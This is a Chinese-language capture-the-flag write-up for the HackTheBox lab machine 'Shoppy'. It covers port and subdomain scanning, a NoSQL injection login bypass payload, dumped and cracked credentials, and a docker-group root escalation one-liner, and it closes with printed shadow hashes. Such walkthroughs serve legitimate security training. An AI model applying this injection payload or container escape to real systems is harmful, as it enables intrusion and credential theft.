Shoppy - HackTheBox

基本信息

• https://www.hackthebox.com/home/machines/profile/496

• 10.10.11.180

端口扫描

22,80:

$ nmap -sC -sV -Pn 10.10.11.180
Starting Nmap 7.93 ( https://nmap.org ) at 2022-09-23 14:50 CST
Nmap scan report for 10.10.11.180
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 9e5e8351d99f89ea471a12eb81f922c0 (RSA)
|   256 5857eeeb0650037c8463d7a3415b1ad5 (ECDSA)
|_  256 3e9d0a4290443860b3b62ce9bd9a6754 (ED25519)
80/tcp open  http    nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.53 seconds

80

需要加hosts

10.10.11.180 shoppy.htb

Wait page,还没正式开放：

子域名扫描

子域名可以发现mattermost,这里对字典稍微有点要求：

gobuster vhost -u http://shoppy.htb -w ~/Tools/dict/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt

Found: mattermost.shoppy.htb (Status: 200) [Size: 3122]

目录扫描

简单的扫描或者常规手工枚举可以发现login:

NoSQL注入

登录那里存在注入，但不是普通sql注入，而是NoSQL注入：

• NoSQL injection - HackTricks
  https://book.hacktricks.xyz/pentesting-web/nosql-injection

admin'||''=='

search功能使用同样的payload搜索，结果中得到密码hash,可以解出来josh的密码：

[{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"},{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}]

josh : remembermethisway

mattermost

得到的josh账号密码可以登录mattermost,在其中一个频道中得到jaeger账号密码：

username: jaeger
password: Sh0ppyBest@pp!

user flag

得到的jaeger用户ssh登录：

提权信息

上面信息可以看到是需要先到deploy用户，这个程序strings没什么有用信息，但直接cat再结合尝试运行的报错信息，能够得到密码,没错，密码就是Sample：

deploy

使用密码运行程序，得到deploy的密码：

切换到deploy用户，发现当前用户在docker组中，那就是常规的docker挂载提权：

提权 & root flag

• docker | GTFOBins
  https://gtfobins.github.io/gtfobins/docker/

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

shadow

root:$y$j9T$0gd6YLeK1QF8eXOhAGmb2.$rvSHnH5qysjj79l0OiXizdnFwT1vsQzz5U4p/vrHQMB:19195:0:99999:7:::
jaeger:$y$j9T$Dd.LPLKhUiqLImmrThQ.m/$zWTCxncUITpaG1GhvvV66fhFWRh2CVz.KtJH4bd1ke.:19195:0:99999:7:::
deploy:$y$j9T$1u25BMNE1Y2tRYy7ne.wg/$mHEZ.4Y9kanC0001s.p5Q8qqzwt9TYgj6nrvaqDlPcB:19195:0:99999:7:::

参考资料

• NoSQL injection - HackTricks
  https://book.hacktricks.xyz/pentesting-web/nosql-injection
• docker | GTFOBins
  https://gtfobins.github.io/gtfobins/docker/
• Shoppy - HTB [Discussion] | BreachForums
  https://breached.to/Thread-Shoppy-HTB-Discussion
• HackTheBox (HTB) Writeup: Shoppy [Easy] – meowmeowattack
  https://meowmeowattack.wordpress.com/2022/09/21/hackthebox-htb-writeup-shoppy-easy/